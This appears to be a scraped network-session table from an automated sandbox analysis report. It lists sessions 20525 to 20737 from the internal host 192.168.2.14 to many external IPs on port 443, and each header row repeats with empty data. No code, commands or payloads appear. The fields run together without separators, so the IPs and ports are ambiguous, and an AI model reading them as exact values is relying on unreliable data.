                                                        20525192.168.2.1445944112.179.130.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20526192.168.2.1434100182.86.4.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20527192.168.2.1452876147.106.240.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20528192.168.2.1444628223.114.240.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20529192.168.2.145744278.195.198.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20530192.168.2.1433226102.197.8.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20531192.168.2.1455478168.88.200.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20532192.168.2.1441306222.76.95.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20533192.168.2.144711097.58.80.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20534192.168.2.145904681.19.39.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20535192.168.2.1451766210.156.163.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20536192.168.2.1444456114.135.158.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20537192.168.2.144360419.202.224.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20538192.168.2.1457798109.99.193.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20539192.168.2.143807692.123.10.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20540192.168.2.1456076124.40.117.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20541192.168.2.143622635.38.240.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20542192.168.2.1450862195.138.169.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20543192.168.2.1438300109.222.204.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20544192.168.2.144359437.121.62.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20545192.168.2.1450676187.189.103.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20546192.168.2.1435124173.217.15.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20547192.168.2.145971664.11.254.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20548192.168.2.1435544201.22.28.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20549192.168.2.1434912148.106.140.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20550192.168.2.145984063.65.211.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20551192.168.2.145964671.30.33.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20552192.168.2.1444198188.17.45.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20553192.168.2.144077236.162.225.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20554192.168.2.1447772216.72.201.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20555192.168.2.1437870122.231.207.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20556192.168.2.1441942160.189.5.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20557192.168.2.1457814209.46.78.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20558192.168.2.144421068.138.236.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20559192.168.2.143931053.54.126.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20560192.168.2.1441212183.42.7.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20561192.168.2.1453952131.220.26.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20562192.168.2.1451230114.72.200.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20563192.168.2.144943870.124.40.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20564192.168.2.1458772139.187.113.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20565192.168.2.1442054209.37.59.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20566192.168.2.145289666.186.36.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20567192.168.2.143551820.209.25.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20568192.168.2.1439678109.79.140.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20569192.168.2.145217272.67.75.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20570192.168.2.1439314210.64.182.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20571192.168.2.145581239.254.198.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20572192.168.2.1446144148.209.220.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20573192.168.2.144244488.11.59.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20574192.168.2.144785017.175.101.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20575192.168.2.1460654164.6.232.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20576192.168.2.1459164212.17.124.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20577192.168.2.1433370102.18.252.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20578192.168.2.143767218.184.101.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20579192.168.2.1434332202.73.57.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20580192.168.2.1457548207.154.145.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20581192.168.2.1453088128.34.157.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20582192.168.2.1440260137.246.24.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20583192.168.2.1449100131.146.201.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20584192.168.2.1445774165.42.193.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20585192.168.2.1457382211.149.103.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20586192.168.2.145766258.184.214.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20587192.168.2.1439342121.46.134.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20588192.168.2.144713482.211.217.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20589192.168.2.14571564.8.242.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20590192.168.2.1452908160.148.207.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20591192.168.2.144099838.49.176.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20592192.168.2.1455232205.96.225.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20593192.168.2.145102261.140.186.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20594192.168.2.1446204104.63.0.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20595192.168.2.1450228200.240.27.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20596192.168.2.1433052172.204.109.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20597192.168.2.144847619.39.72.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20598192.168.2.143405820.211.203.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20599192.168.2.1443576131.170.189.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20600192.168.2.1435364195.103.126.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20601192.168.2.1452442153.132.235.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20602192.168.2.1460744107.120.75.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20603192.168.2.14609729.47.15.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20604192.168.2.1450542138.204.140.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20605192.168.2.1451260169.101.202.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20606192.168.2.144338093.82.159.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20607192.168.2.1433966182.198.101.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20608192.168.2.146097472.186.246.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20609192.168.2.1455868195.146.227.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20610192.168.2.1449644199.173.79.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20611192.168.2.145476820.217.14.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20612192.168.2.1446228113.205.254.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20613192.168.2.144355847.119.51.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20614192.168.2.145700444.167.22.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20615192.168.2.144430061.56.83.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20616192.168.2.1452308136.43.60.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20617192.168.2.144606638.49.180.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20618192.168.2.1439596119.218.212.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20619192.168.2.1441840221.232.107.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20620192.168.2.1446856125.193.75.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20621192.168.2.1449084119.173.194.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20622192.168.2.1440714192.183.152.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20623192.168.2.1446206202.60.63.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20624192.168.2.14369745.3.206.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20625192.168.2.1453062187.32.72.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20626192.168.2.1460372216.27.17.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20627192.168.2.1438902204.106.186.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20628192.168.2.1456196128.210.27.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20629192.168.2.1447122120.156.65.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20630192.168.2.1446582164.109.205.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20631192.168.2.14513269.252.122.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20632192.168.2.143824043.199.98.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20633192.168.2.14608921.185.6.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20634192.168.2.1439410109.75.162.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20635192.168.2.145752869.119.28.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20636192.168.2.1438054152.151.82.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20637192.168.2.1450986174.236.110.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20638192.168.2.145877049.25.232.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20639192.168.2.146040436.3.47.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20640192.168.2.1437486103.99.237.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20641192.168.2.1434000164.115.242.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20642192.168.2.1438056212.116.117.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20643192.168.2.145203697.202.64.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20644192.168.2.145327058.19.183.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20645192.168.2.143738670.11.197.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20646192.168.2.1439262153.17.156.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20647192.168.2.143999487.16.45.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20648192.168.2.1441326124.178.77.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20649192.168.2.144292664.248.128.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20650192.168.2.1436618207.19.143.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20651192.168.2.1449020140.95.45.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20652192.168.2.144008250.202.174.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20653192.168.2.145752486.123.68.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20654192.168.2.144901296.154.174.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20655192.168.2.1435616179.210.56.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20656192.168.2.1457296221.179.174.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20657192.168.2.1456372209.6.194.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20658192.168.2.143317669.123.253.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20659192.168.2.1440504107.86.189.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20660192.168.2.1455222198.82.238.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20661192.168.2.144235067.229.53.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20662192.168.2.1436644191.47.202.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20663192.168.2.1436026202.238.33.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20664192.168.2.1456500171.19.190.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20665192.168.2.1457080141.107.159.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20666192.168.2.145846250.49.225.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20667192.168.2.146002251.75.138.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20668192.168.2.145647476.31.96.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20669192.168.2.143949650.118.28.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20670192.168.2.1440628112.164.106.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20671192.168.2.1457126198.49.151.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20672192.168.2.1453820166.64.74.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20673192.168.2.1458918121.212.116.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20674192.168.2.145684473.118.5.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20675192.168.2.1454346116.222.241.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20676192.168.2.145840050.104.86.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20677192.168.2.1451948106.170.159.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20678192.168.2.1455298164.43.42.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20679192.168.2.145091469.45.84.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20680192.168.2.1447834186.195.87.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20681192.168.2.1433654130.151.117.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20682192.168.2.143569887.120.62.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20683192.168.2.1447910181.228.153.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20684192.168.2.143835650.83.201.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20685192.168.2.1458088193.108.204.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20686192.168.2.14521344.44.154.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20687192.168.2.1449822116.176.184.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20688192.168.2.145945259.208.178.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20689192.168.2.1454386190.32.132.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20690192.168.2.1438202210.142.98.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20691192.168.2.1450892122.11.193.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20692192.168.2.144745050.12.48.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20693192.168.2.1433590128.53.51.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20694192.168.2.144139893.236.70.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20695192.168.2.145559235.43.203.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20696192.168.2.1457828185.180.194.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20697192.168.2.143364651.130.232.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20698192.168.2.1452188147.214.208.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20699192.168.2.144330647.32.13.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20700192.168.2.144400862.88.201.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20701192.168.2.1452300161.149.114.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20702192.168.2.144090234.247.12.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20703192.168.2.143902664.197.60.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20704192.168.2.1443446158.13.145.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20705192.168.2.144972648.90.99.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20706192.168.2.1443600148.61.129.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20707192.168.2.144899470.202.157.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20708192.168.2.1455738107.9.192.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20709192.168.2.1458836167.234.226.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20710192.168.2.1440086213.222.90.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20711192.168.2.1435656120.141.123.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20712192.168.2.1445682141.214.29.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20713192.168.2.144159695.187.44.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20714192.168.2.143769034.32.141.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20715192.168.2.1442916100.189.72.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20716192.168.2.1442058181.125.225.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20717192.168.2.1448284175.168.254.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20718192.168.2.1458048168.162.231.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20719192.168.2.1437952216.62.198.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20720192.168.2.1434760205.85.241.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20721192.168.2.144829658.250.153.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20722192.168.2.145987262.26.194.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20723192.168.2.1451350212.150.232.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20724192.168.2.1452136218.98.79.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20725192.168.2.1438596167.31.107.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20726192.168.2.1452796148.65.248.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20727192.168.2.1442272141.3.83.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20728192.168.2.1453304211.162.59.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20729192.168.2.143345084.74.84.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20730192.168.2.144134654.244.80.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20731192.168.2.143993687.33.87.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20732192.168.2.143773461.15.212.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20733192.168.2.1440336124.248.78.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20734192.168.2.143971682.225.155.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20735192.168.2.1459910188.254.119.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20736192.168.2.1439832156.189.232.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20737192.168.2.1436952124.138.160.118443
